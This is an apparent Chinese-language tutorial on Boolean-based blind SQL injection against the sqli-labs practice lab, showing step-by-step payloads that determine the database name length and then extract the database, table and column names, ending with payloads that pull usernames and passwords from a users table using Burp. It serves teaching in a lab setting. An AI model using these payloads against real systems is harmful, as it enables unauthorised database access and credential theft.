Boolean注入攻击
爆库名
访问测试注入地址:http://192.168.1.118/sqli/Less-1/?id=1
and length(database())>=1
返回正常
and length(database())>=10
返回错误
利用返回正常,返回错误进行注入
注:有些杠精又要说我直接用union联合注入不就行了,我在这里说明一下,我教的是Boolean注入
利用burp去跑一下,发现9报错,那就表明库的字段长度为8
and substr(database(),1,1)='x'
继续利用burp爆破库名的第一位值
第一位为s
数据库名不区分大小
以此类推爆8次即可
数据库为:security
爆表名
and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='x'
表名第一位为e
以此类推
表名
emails
referers
uagents
users
爆列名
and substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='x'
列名第一位为i
以此类推
列名
id
username
password
爆内容
and substr((select username from users limit 0,1),1,1)='x'
and substr((select password from users limit 0,1),1,1)='x'
网友评论